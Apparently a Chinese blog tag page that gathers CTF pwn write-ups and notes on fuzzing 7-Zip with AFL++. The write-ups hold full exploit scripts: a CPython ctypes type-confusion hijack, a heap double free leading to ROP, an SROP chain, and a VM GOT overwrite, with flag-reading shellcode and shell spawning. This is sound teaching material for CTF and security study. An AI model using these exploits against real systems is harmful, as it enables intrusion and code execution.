包含关键字 Linux 的文章

少见的 Python interpreter pwn,漏洞点也很有意思。

Challenge

Python 3.12.4

import ctypes

from typing import Union, List, Dict

STRPTR_OFFSET = 0x28 
LENPTR_OFFSET = 0x10

class MutableStr:
    pass

class MutableStr:
    def __init__(self, data:str):
        self.data = data
        self.base_ptr = id(self.data)
        self.max_size_str = ""

    def set_max_size(self, max_size_str):
        if int(max_size_str) < ((len(self)+7) & ~7):
            self.max_size_str = max_size_str
        else:
            print("can't set max_size: too big")

    def __repr__(self):
        return self.data

    def __str__(self):
        return self.__repr__()        

    def __len__(self):
        if self.base_ptr is None:
            return 0
        ptr = ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))
        return ptr[0]
    
    def __getitem__(self, key:int):
        if not isinstance(key, int):
            raise NotImplementedError
        if key >= len(self) or key < 0:
            raise RuntimeError("get overflow")
        
        return self.data[key]

    def __setitem__(self, key:int, value:int):
        if not isinstance(value, int):
            raise NotImplementedError("only support integer value")

        if not isinstance(key, int):
            raise NotImplementedError("only support integer key")

        if key >= len(self) or key < 0:
            raise RuntimeError(f"set overflow: length:{len(self)}, key:{key}")
        
        strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
        strptr[key] = value
    
    def __add__(self, other:Union[str,MutableStr]):
        if isinstance(other, str):
            return MutableStr(self.data + other)
        
        if isinstance(other, MutableStr):
            return MutableStr(self.data + other.data)
        
        raise NotImplementedError()
    
    def _add_str(self, other):
        if self.max_size_str == "":
            max_size = (len(self)+7) & ~7
        else:
            max_size = int(self.max_size_str)
        if len(self)+len(other) <= max_size:
            other_len = len(other)
            strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
            otherstrptr = ctypes.cast(id(other) + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
            for i in range(other_len):
                strptr[i+len(self)] = otherstrptr[i]
            if len(self)+other_len < max_size:
                # strptr[len(self)+other_len] = 0 
                pass
            ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))[0] += other_len
        else:
            print("Full!")
        return self
    
    def __iadd__(self, other):
        if isinstance(other, str):
            return self._add_str(other)
        if isinstance(other, MutableStr):
            return self._add_str(other.data)
        return self

def new_mstring(data:str) -> MutableStr:
    return MutableStr(data)

mstrings:List[MutableStr] = []

def main():
    while True:
        try:
            cmd, data, *values = input("> ").split()
            if cmd == "new":
                mstrings.append(new_mstring(data))
            
            if cmd == "set_max":
                idx = int(values[0])
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                mstrings[idx].set_max_size(data)
            
            if cmd == "+":
                idx1 = int(data)
                idx2 = int(values[0])
                if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
                    print("invalid index")
                    continue
                mstrings.append(mstrings[idx1]+mstrings[idx2])

            if cmd == "+=":
                idx1 = int(data)
                idx2 = int(values[0])
                if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
                    print("invalid index")
                    continue
                mstrings[idx1] += mstrings[idx2]

            if cmd == "print_max":
                idx = int(data)
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                print(mstrings[idx].max_size_str)

            if cmd == "print":
                idx = int(data)
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                print(mstrings[idx].data)

            if cmd == "modify":
                idx = int(data)
                offset = int(values[0])
                val = values[1]
                
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                mstrings[idx][offset] = int(val)
        except EOFError:
            break
        except Exception as e:
            print(f"error: {e}")

print("hello!", flush=True)
main()

省流:Python 的 str 不可变,题目用 ctypes 强行实现了一个可变字符串 MutableStr

赛中手写了个 fuzzer,发现了一个很有意思的崩溃,但一直没看懂。(好在让我意识到 CPython 对单字节字符串有特别的优化,见下文。)

Hello!
> new O
> modify 0 0 0
这样就有可能 SIGSEGV,原因是空指针解引用。

Bug

CPython 给每个单字节字符串预先分配了一个对象,位于 python 本身的数据段,所有相同的单字节字符串都指向同一个地方。如果我们先 new 一个 MutableStr '6',将另一个 MutableStrmax_size_str 设置成 '6',那么接下来改 '6' 就是改另一个 MutableStrmax_size_str。(考虑到最终 getshell 时的一些细节,需要用 6 而不是 7。)

Hello!
> new 6
> new 0
> set_max 6 1
> print_max 1
6
> += 0 0
> print_max 1
66

我们由此可以获得任意长溢出写。

CPython 用 PyASCIIObject 存储纯单字节字符串,记录长度,不依赖尾空字节。如果字符串里有非 ASCII 字符,就会改用 PyCompactUnicodeObject,此时 0x28(STRPTR_OFFSET)偏移处新增两个 8 字节字段 utf8_lengthutf8。(见源码 Python-3.12.4/Include/cpython/unicodeobject.h

typedef struct {
    PyObject_HEAD
    Py_ssize_t length;
    Py_hash_t hash;
    struct {
        unsigned int interned:2;
        unsigned int kind:3;
        unsigned int compact:1;
        unsigned int ascii:1;
        unsigned int statically_allocated:1;
        unsigned int :24;
    } state;
} PyASCIIObject;

typedef struct {
    PyASCIIObject _base;
    Py_ssize_t utf8_length;
    char *utf8;
} PyCompactUnicodeObject;

数据紧随这两个结构体之后(8 字节对齐)。CPython 存储 Unicode 字符采用定长编码,通常 UCS2(类似 UTF16),遇到大于两字节的字符则 UCS4。当 utf8 不为 NULL 时,print 就不再重新 UCS2 转 UTF8,而是直接根据这两个字段打印字符串。

但是 MutableStr 没有正确处理非 ASCII 情况,当拼接字符串时仍然向原偏移处即字符串末尾前 16 字节处写入字符串并且增加长度(注意 Python 的字符串长度是指 Unicode 码点数),我们可以结合篡改 max_size_str 从而泄露 Unicode 字符串 data 后任意偏移大约 16 字节的信息。

Exploit

笔者十分不喜欢 glibc heap pwn。以下解法不依赖特定 libc 版本,也没有 🏠。

每个 PyObject 都有一个 PyTypeObject 指针,表示对象的类型,其中有类型信息和各种操作的虚函数指针等。由于动态分配的对象在 pymalloc(不大于 512 字节)或 libc 堆上,所以理所应当可能有相邻对象的 PyTypeObject 指针,从而泄露 PIE 基址。

这里有个细节,当实际使用 print 命令打印这个字符串时,泄露出来的信息会变成其他字符。这是 builtin_print 时编码转换导致的,我们的脚本需要将实际输出的内容看做 UTF8 字节流再转为 UCS2 字节流以获取原始泄露信息。

得到基址后,我们再越界写篡改刚才提到的预先分配好的单字节字符串对象的 PyTypeObject 指针,提前伪造虚函数表,print 伪造了虚函数表的 data 从而劫持控制流。

Exp:

from pwn import *

context(arch='amd64', os='linux', log_level='debug', terminal = ['konsole', '-e'])
binary = './python'
io = process([binary, 'mstr.py'])
e = ELF(binary)

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

def new_bytes(content: bytes, index: int) -> None:
    io.sendlineafter(b'> ', b'new ' + b'\x00' * len(content))
    context.log_level='info'
    for i, c in enumerate(content):
        io.sendlineafter(b'> ', f'modify {index} {i} {c}'.encode())
    context.log_level='debug'


io.sendlineafter(b'> ', 'new 瑞克'.encode())
io.sendlineafter(b'> ', 'new \x00'.encode()) # for fake type
io.sendlineafter(b'> ', 'new 6'.encode())
io.sendlineafter(b'> ', b'set_max 6 0')
io.sendlineafter(b'> ', b'set_max 6 1')
io.sendlineafter(b'> ', b'+= 2 2')
io.sendlineafter(b'> ', b'+= 2 2') # max size 6666
io.sendlineafter(b'> ', b'new ' + b'\x00' * 20)
io.sendlineafter(b'> ', '+= 0 3'.encode())
io.sendlineafter(b'> ', 'print 0'.encode())

data_leaked = io.recvline(drop=True).decode('utf-8').encode('utf-16-le')
# for i in range(0, len(data_leaked) - 8, 8):
#     print(f'{u64(data_leaked[i: i + 8]):#x}')
e.address = u64(data_leaked[16:24]) - e.sym['PyBytes_Type']
if e.address % 0x1000 != 0:
    exit(1)
print_leaked('elf_base', e.address)

gdb.attach(io, f'awa *{e.sym['_PyRuntime'] + 62000}')
# modify PyTypeObject ptr & construct fake PyTypeObject
new_bytes(b'cafebab' + cyclic(40).replace(b'caaadaaa', p64(e.sym['_PyRuntime'] + 62000)).replace(
    # For some reasons, `ph\x00` will become `sh\x00` (+= 3)
    b'aaaa', b'ph\x00\x00') + b'\x00' * 88 + p64(e.plt['system']), 4)
io.sendlineafter(b'> ', b'+= 1 4')

io.sendlineafter(b'> ', 'new \x01'.encode())  # fake type victim
io.sendlineafter(b'> ', 'print 5'.encode())  # invoke virtual function

io.interactive()

🐍🔥🐍🔥🐍🔥🐍🔥

由于堆布局每次运行时不同,只是有概率成功(如果加上堆喷可以做到每次成功)。以上 exploit 不破坏控制流完整性,即使开启 SHSTK 和 IBT 保护也可以绕过。

malloc

自定义堆内存管理器。

堆块结构:

| Offset | Field          | Description                        |
|---------|----------------|------------------------------------|
| +0      | in_use (1B)    | 1 = allocated, 0 = free            |
| +1..7   | padding        | for 8-byte alignment               |
| +8      | size (4B)      | total size of the chunk            |
| +12..15 | padding        | (align next pointer)               |
| +16     | next (8B)      | pointer to next free chunk         |
| +16     | user data start| returned to caller (malloc result) |

delete 时存在 UAF,且 double free 检测深度只有 13,而我们最多可以申请 16 个堆块。double free 后再多次 create 得到重叠堆块,修改 next 指针得到任意地址(目标地址 - 16)分配,从而任意地址读写。

泄露 libc、stack 基地址后任意分配到栈上写 ROP,返回至提前布置好的 shellcode。程序沙箱禁用 execve 等系统调用,考虑 orw。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='info')
binary = './pwn'
# io = process(binary)
io = connect('45.40.247.139', 18565)
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=False)

# 0x0f < size <= 0x70
def create(index: int, size: int):
    io.sendlineafter(b'=======================\n', b'1')
    io.sendlineafter(b'Index\n', itob(index))
    io.sendlineafter(b'size\n', itob(size))

def delete(index: int):
    io.sendlineafter(b'=======================\n', b'2')
    io.sendlineafter(b'Index\n', itob(index))

def edit(index: int, size: int, content: bytes):
    io.sendlineafter(b'=======================\n', b'3')
    io.sendlineafter(b'Index\n', itob(index))
    io.sendlineafter(b'size\n', itob(size))
    io.send(content)

def show(index: int):
    io.sendlineafter(b'=======================\n', b'4')
    io.sendlineafter(b'Index\n', itob(index))

def exitit():
    io.sendlineafter(b'=======================\n', b'5')

for i in range(15):
    create(i, 0x10)
for i in range(15):
    delete(i)
delete(0) # double free
show(14) # leak heap (elf)
e.address = u64(io.recvline(False).ljust(8, b'\x00')) - 0x53a0
print_leaked('elf_base', e.address)
create(0, 0x10)
edit(0, 8, p64(e.sym['stdout'] - 16)) # `next` -> stdout
for _ in range(16):
    create(1, 0x10)
show(1)
libc.address = u64(io.recvline(False).ljust(8, b'\x00')) - 0x21b780
print_leaked('libc_base', libc.address)

for i in range(15):
    create(i, 0x20)
for i in range(15):
    delete(i)
delete(0) # double free
create(0, 0x20)
edit(0, 8, p64(libc.sym['environ'] - 16)) # `next` -> environ
for _ in range(16):
    create(1, 0x20)
show(1)
stack_addr = u64(io.recvline(False).ljust(8, b'\x00'))
print_leaked('stack_addr', stack_addr)

for i in range(15):
    create(i, 0x70)
for i in range(15):
    delete(i)
delete(0) # double free
create(0, 0x70)
edit(0, 8, p64(stack_addr - 0x140 - 16)) # `next` -> stack retaddr
for _ in range(16):
    create(1, 0x70)
# gdb.attach(io, 'b *$rebase(0x18F2)')
edit(0, 0x70, asm(f"""
    mov rax, 0x67616c662f
    push rax

    mov rax, __NR_open
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    syscall

    mov rax, __NR_read
    mov rdi, 3
    mov rsi, rsp
    mov rdx, 0x50
    syscall

    mov rax, __NR_write
    mov rdi, 1
    mov rsi, rsp
    mov rdx, 0x50
    syscall
"""))
edit(1, 0x70, flat([
    libc.search(asm('pop rdi;ret')).__next__(),
    e.address + 0x5000,
    libc.search(asm('pop rsi;ret')).__next__(),
    0x1000,
    libc.search(asm('pop rdx;pop r12;ret')).__next__(),
    7,
    0,
    libc.sym['mprotect'],
    e.address + 0x56c0
]))

io.interactive()

stack

看起来是堆溢出但其实会栈迁移到堆上,溢出改返回地址爆破 PIE 到 magic。

由于随机数种子来自已知时间,所以可以预测随机数,逆运算得到 PIE 基地址。

最后栈迁移到 bss 段,利用 SROP 和 syscall gadget 实现任意系统调用。程序 seccomp 沙箱禁用了 openexecve 等系统调用,考虑 openat 替代。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

context(arch='amd64', os='linux', terminal=['konsole', '-e'])
binary = './Stack_Over_Flow'
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=False)

while True:
    global io, elf_base
    io = connect('45.40.247.139', 30871)
    libc_lib = CDLL('/usr/lib/libc.so.6')
    libc_lib.srand(libc_lib.time(0))
    libc_lib.rand() % 5
    libc_lib.rand() % 5
    key = libc_lib.rand() % 5
    try:
        io.sendafter(b'luck!\n', cyclic(0x2000)[:cyclic(0x2000).index(b'qaacraac')] + b'\x5F\x13')
        
        if b'magic' not in io.recvuntil(b':'):
            io.close()
            continue
        e.address = (int(io.recvline(False)) // key) - 0x16b0
        break
    except Exception:
        io.close()
        continue

context.log_level = 'debug'

print_leaked('elf_base', e.address)

syscall = e.address + 0x000000000000134f
fake_stack = e.bss(0x800)

# stack mig
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = fake_stack
frame.rdx = 0x800
frame.rip = syscall
frame.rsp = fake_stack

# gdb.attach(io, 'b *$rebase(0x16A4)')
io.sendafter(b'luck!\n', flat([
    cyclic(0x100),
    0,
    syscall,
    0,
    syscall,
    bytes(frame)
]))
pause()
io.send(cyclic(0xf))

# mprotect
frame = SigreturnFrame()
frame.rax = 10
frame.rdi = fake_stack & ~0xfff
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = syscall
frame.rsp = fake_stack + 0x200

xor_rax_pop_rbp = e.address + 0x00000000000016a0

payload = flat([
    0,
    xor_rax_pop_rbp,
    0,
    syscall,
    0,
    syscall,
    bytes(frame)
])
payload = payload.ljust(0x200, b'\x00')
payload += flat([
    0,
    fake_stack + 0x300
])
payload = payload.ljust(0x300, b'\x00')
payload += asm("""
    push 0x50
    lea rax, [rsp - 0x60]
    push rax

    mov rax, 0x67616c662f
    push rax

    push __NR_openat ; pop rax
    xor rdi, rdi
    push rsp ; pop rsi
    xor rdx, rdx
    xor r10, r10
    syscall
    push rax

    push __NR_readv ; pop rax
    pop rdi
    popf
    push rsp ; pop rsi
    push 1 ; pop rdx
    syscall

    push __NR_writev ; pop rax
    push 1 ; pop rdi
    syscall
""")
pause()
io.send(payload)
pause()
io.send(cyclic(0xf))

io.interactive()

mvmps

参考软件系统安全赛 - vm

00000000 struct __attribute__((packed)) __attribute__((aligned(1))) VM // sizeof=0x49
00000000 {
00000000     char *vmcode;
00000008     int pc;
0000000C     int field_C;
00000010     __int64 regs[6];
00000040     int64_t sp;
00000048     BYTE field_48;
00000049 };

SUB SP 时栈指针下溢,PUSH 和 POP 操作变成 ELF 几乎任意地址读写。

不是 PIE,劫持 GOT 即可。读取 read@got 低 4 字节,减去偏移得到 system 地址,将其写回 read@got 低 4 字节,内存中写入 "sh",执行 read 并传入首个参数为 "sh" 地址。指令有四种格式。具体见下方 exp 注释。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='debug')
binary = './vvmm'
# io = process(binary)
io = connect('45.40.247.139', 15101)
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=False)
# gdb.attach(io, 'b *0x401CBF\nb *0x4015AA\nb *0x401CC6\nb *0x402742\nb *0x4025E7\nb *0x4014AF\nb *0x4015CE')

def INST(opcode: int, type: int, *args) -> bytes:
    header = p8(opcode << 2 | type)
    if type == 0:
        return header + p8((args[0] & 0xff0000) >> 16) + p8((args[0] & 0xff00) >> 8) + p8(args[0] & 0xff)
    if type == 1:
        return header + p8(args[0])
    if type == 2:
        return header + p8(args[0]) + p8(args[1])
    if type == 3:
        return header + p8(args[0]) + p32(args[1])
    raise ValueError("Invalid type.")

io.sendafter(b'Please input your opcodes:\n', b''.join([
    INST(0x24, 0, 0x418), # SUB SP (to read@got)
    INST(0x20, 1, 0), # read from elf (read@got)
    INST(0xb, 3, 0, 0xc3a60), # REG SUB (offset of read & system)
    INST(0x1f, 1, 0), # write to elf (system)
    INST(0x3, 3, 1, 0x6873), # LOAD IMM ("sh")
    INST(0x25, 0, 0x30), # ADD SP (arbitrary mem)
    INST(0x1f, 1, 1), # write to elf ("sh")
    INST(0x3, 3, 0, 0x4050fc), # LOAD IMM (arbitrary mem)
    INST(0x33, 0, 0), # SYSCALL (read@plt -> system with arg "sh")
]))

io.interactive()

第一次尝试

使用 archlinux 的 p7zip PKGBULD,修改编译器为 afl-clang-lto(++)

编译时发现一个函数指针类型转换的报错,用 -Wno-cast-function-type-strict 参数来抑制。

准备了三个随便的 7z 文件,放进 input 文件夹直接开始。(@@ 表示输入文件目录,而不是从 stdin 输入)

AFL_SKIP_CPUFREQ=1 afl-fuzz -i input -o output -- ./7zr x @@

结果:🈚️(其实之后的所有尝试都没结果💦)

第二次尝试

准备了很多只有一个或几个文件,大小仅 100+ 字节的 7z 文件作为输入。

AFL_SKIP_CPUFREQ=1 afl-fuzz -i input -o output -- ./7zr x @@ -y

结果:覆盖率很快达到和第一次同样水平。

第三次尝试

了解到 7z 格式有 CRC 校验,估计大多数 fuzz 输入都死在校验上了。patch 源码去除校验:(应该使用 FUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION 宏)

static inline bool TestStartCrc(const Byte *p)
{
  (void)p; // 抑制 -Wunused-parameter
  return true;
}

if (CrcCalc(buffer2, nextHeaderSize_t) != nextHeaderCRC)
    ;

if (CrcCalc(data, unpackSize) != folders.FolderCRCs.Vals[i])
    ;

添加 -fsanitize=address -g 编译选项。添加 -so 运行选项,这样不会在目录里拉💩。

本来想加上 -si 参数从 stdin 输入压缩文件,应该可以大幅提升性能。但是 7z 格式竟然不支持,原因是 7z 有一部分文件头在文件末尾,解压前必须先读取。(意义不明...)

把整个 fuzzing 项目文件夹放在 tmpfs 里应该会更快吧,虽然 afl 官网教程推荐 ext2 + noatime。因为现在基本是在实验,暂时懒得配置 ext2 环境了。

AFL_USE_ASAN=1 AFL_SKIP_CPUFREQ=1 afl-fuzz -i input -o output -- ./7zr x @@ -y -so

结果:本来不抱什么希望,睡了个午觉起来竟然就真的收集到了很多 crashes,但都是 OOM,没什么实际意义。(用 KDE Ark 打开其中某个 input,直接 coredump 了。)

==589143==ERROR: AddressSanitizer: requested allocation size 0x207ffffffffffff (0x208000000001000 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
    #0 0x6048688567e2 in operator new[](unsigned long) (/tmp/7zfuzz/7zr+0x1fa7e2) (BuildId: 8450a6b1d6712a80c42046efedb6d74eb798c38d)
    #1 0x604868c0e1e0 in CBuffer<unsigned char>::Alloc(unsigned long) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/../../Common/../../Common/MyBuffer.h:72:18
    #2 0x604868c1f5bd in NArchive::N7z::CInArchive::ReadAndDecodePackedStreams(unsigned long, unsigned long&, CObjectVector<CBuffer<unsigned char>>&, ICryptoGetTextPassword*, bool&, bool&, UString&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/7zIn.cpp:1187:10
    #3 0x604868c280ce in NArchive::N7z::CInArchive::ReadDatabase2(NArchive::N7z::CDbEx&, ICryptoGetTextPassword*, bool&, bool&, UString&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/7zIn.cpp:1705:28
    #4 0x604868be4ddd in NArchive::N7z::CInArchive::ReadDatabase(NArchive::N7z::CDbEx&, ICryptoGetTextPassword*, bool&, bool&, UString&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/7zIn.cpp:1743:25
    #5 0x604868be4ddd in NArchive::N7z::CHandler::Open(IInStream*, unsigned long const*, IArchiveOpenCallback*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/7zHandler.cpp:708:30
    #6 0x604868dc6db4 in OpenArchiveSpec(IInArchive*, bool, IInStream*, unsigned long const*, IArchiveOpenCallback*, IArchiveExtractCallback*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:1599:3
    #7 0x604868dbc2ba in CArc::OpenStream2(COpenOptions const&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:2744:26
    #8 0x604868dc9229 in CArc::OpenStream(COpenOptions const&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3024:3
    #9 0x604868dcb6c1 in CArc::OpenStreamOrFile(COpenOptions&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3119:17
    #10 0x604868dcda76 in CArchiveLink::Open(COpenOptions&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3295:28
    #11 0x604868dd277e in CArchiveLink::Open2(COpenOptions&, IOpenCallbackUI*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3419:17
    #12 0x604868d49f6d in CArchiveLink::Open3(COpenOptions&, IOpenCallbackUI*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3487:17
    #13 0x604868d49f6d in CArchiveLink::Open_Strict(COpenOptions&, IOpenCallbackUI*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/../Common/OpenArchive.h:437:22
    #14 0x604868d49f6d in Extract(CCodecs*, CObjectVector<COpenType> const&, CRecordVector<int> const&, CObjectVector<UString>&, CObjectVector<UString>&, NWildcard::CCensorNode const&, CExtractOptions const&, IOpenCallbackUI*, IExtractCallbackUI*, IFolderArchiveExtractCallback*, IHashCalc*, UString&, CDecompressStat&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/Extract.cpp:422:30
    #15 0x604868e55d25 in Main2(int, char**) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Console/Main.cpp:1378:21
    #16 0x604868e68411 in main /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Console/MainAr.cpp:132:11
    #17 0x7bc23b33f6b4 in __libc_start_call_main /usr/src/debug/glibc/glibc/csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #18 0x7bc23b33f768 in __libc_start_main /usr/src/debug/glibc/glibc/csu/../csu/libc-start.c:360:3
    #19 0x604868717a24 in _start (/tmp/7zfuzz/7zr+0xbba24) (BuildId: 8450a6b1d6712a80c42046efedb6d74eb798c38d)

==589143==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: allocation-size-too-big (/tmp/7zfuzz/7zr+0x1fa7e2) (BuildId: 8450a6b1d6712a80c42046efedb6d74eb798c38d) in operator new[](unsigned long)
==589143==ABORTING

这触发原理我还真没看明白,不过 7z 文件格式里有不少直接由用户控制长度的字段,出现这种情况也算正常吧。

第四次尝试

CPP/Common/MyBuffer.h 里内存分配相关的函数用 __attribute__((no_sanitize("address"))) 标记,这样就不会被 ASAN 追踪了。由于这些内存分配函数本来就是热点,所以性能提升了不少,也不会报无意义的 OOM 错误,而且应该不会错过什么漏洞(毕竟真的只是 new[] 而已)。

刚才发现 afl-llvm-cmplog 这个工具,通过插桩记录程序中的比较操作,帮助 afl++ 生成能触发关键路径的输入。要想启用,需要在编译时加上 AFL_LLVM_CMPLOG=1 环境变量,fuzz 时加上参数 -c 0。在面对需要特定文件格式输入(魔法头之类)的 fuzzing 时效果明显。

AFL_USE_ASAN=1 AFL_SKIP_CPUFREQ=1 afl-fuzz -i input -o output -- ./7zr x @@ -y -so

结果:map density 翻倍了!

wget https://www.gstatic.com/webp/gallery/1.webp -O input/1.webp
wget https://www.gstatic.com/webp/gallery/2.webp -O input/2.webp
wget https://www.gstatic.com/webp/gallery/3.webp -O input/3.webp
wget https://www.gstatic.com/webp/gallery/4.webp -O input/4.webp
wget https://www.gstatic.com/webp/gallery/5.webp -O input/5.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_01.webp -O input/test_01.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_02.webp -O input/test_02.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_03.webp -O input/test_03.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_04.webp -O input/test_04.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_05.webp -O input/test_05.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_06_lossless.webp -O input/test_06_lossless.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_06_lossy.webp -O input/test_06_lossy.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_07_lossless.webp -O input/test_07_lossless.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_07_lossy.webp -O input/test_07_lossy.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_08_lossless.webp -O input/test_08_lossless.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_08_lossy.webp -O input/test_08_lossy.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_09_large.webp -O input/test_09_large.webp

第五次尝试

AFL_QUIET=1

CC=afl-clang-lto CXX=afl-clang-lto++ ./configure --disable-shared
  • 2 Master
  • 4 AFL_USE_ASAN=1 AFL_USE_UBSAN=1 AFL_USE_CFISAN=1
  • 6 AFL_LLVM_CMPLOG=1 -l 2AT
  • 8 AFL_LLVM_LAF_ALL=1
  • 10
cd CPP/7zip/Bundles/Alone2/

export EXEPTOR_CONFIG=$(pwd)/libexeptor.yaml
export EXEPTOR_LOG=$(pwd)/exeptor.log

LD_PRELOAD=/tmp/exeptor/build/libexeptor.so make -j -f ../../cmpl_clang_x64.mak CC=afl-clang-lto CXX=afl-clang-lto++ USE_ASM=1 MY_ASM="uasm"

AFL_QUIET=1 AFL_LLVM_CMPLOG=1 LD_PRELOAD=/tmp/exeptor/build/libexeptor.so make -j -f ../../cmpl_clang_x64.mak CC=afl-clang-lto CXX=afl-clang-lto++ USE_ASM=1 MY_ASM="uasm"

AFL_LLVM_LAF_ALL=1 LD_PRELOAD=/tmp/exeptor/build/libexeptor.so make -j -f ../../cmpl_clang_x64.mak CC=afl-clang-lto CXX=afl-clang-lto++ USE_ASM=1 MY_ASM="uasm"

-f

llvm-ar rcs 7z.a ./b/c_x64/*.o

docker build . -t fuzz-7zip
docker run --rm -it --tmpfs /ramdisk:exec fuzz-7zip
cp -r /root/fuzz/ /ramdisk/ && cd /ramdisk/fuzz
export AFL_TESTCACHE_SIZE=256
AFL_FINAL_SYNC=1 afl-fuzz -i input -o output -M master -a binary -G 1024 -b 2 -- ./7zz_normal x -so -tzip @@
AFL_USE_ASAN=1 afl-fuzz -i input -o output -S sanitizer -a binary -G 1024 -b 4 -- ./7zz_sanitizer x -so -tzip @@
afl-fuzz -i input -o output -S cmplog -a binary -G 1024 -b 6 -c 0 -l 2AT -- ./7zz_cmplog x -so -tzip @@
afl-fuzz -i input -o output -S compcov -a binary -G 1024 -b 8 -- ./7zz_cmpcov x -so -tzip @@
#define Z7_ST
#include "../CPP/7zip/Archive/Common/DummyOutStream.h"
#include "../CPP/7zip/Common/CWrappers.h"
#include "7zAlloc.h"
#include "7zTypes.h"
#include "Alloc.h"
#include "Xz.h"
#include <string.h>
#include <unistd.h>
static const ISzAlloc alloc = {SzAlloc, SzFree};
static int isMT = False;
static CXzStatInfo stat;
class FakeOutStream : public ISequentialOutStream {
  public:
    // IUnknown
    STDMETHOD(QueryInterface)(REFIID, void **) { return S_OK; }
    STDMETHOD_(ULONG, AddRef)() { return 1; }
    STDMETHOD_(ULONG, Release)() { return 1; }
    // ISequentialOutStream
    STDMETHOD(Write)(const void *, UInt32 size, UInt32 *processedSize) {
        *processedSize = size;
        return S_OK;
    }
};
// Dummy input stream for fuzzing, construt with const uint8_t *Data, size_t
// Size
#include <algorithm>
class BufInStream : public ISequentialInStream {
  private:
    const uint8_t *_data;
    size_t _size;
    size_t _pos;

  public:
    BufInStream() : _data(nullptr), _size(0), _pos(0) {}
    void SetData(const uint8_t *data, size_t size) {
        _data = data;
        _size = size;
        _pos = 0;
    }
    // IUnknown
    STDMETHOD(QueryInterface)(REFIID, void **) { return S_OK; }
    STDMETHOD_(ULONG, AddRef)() { return 1; }
    STDMETHOD_(ULONG, Release)() { return 1; }
    // ISequentialInStream
    STDMETHOD(Read)(void *data, UInt32 size, UInt32 *processedSize) {
        if (_pos >= _size) {
            if (processedSize)
                *processedSize = 0;
            return S_OK;
        }
        UInt32 toRead = (UInt32)std::min<size_t>(size, _size - _pos);
        memcpy(data, _data + _pos, toRead);
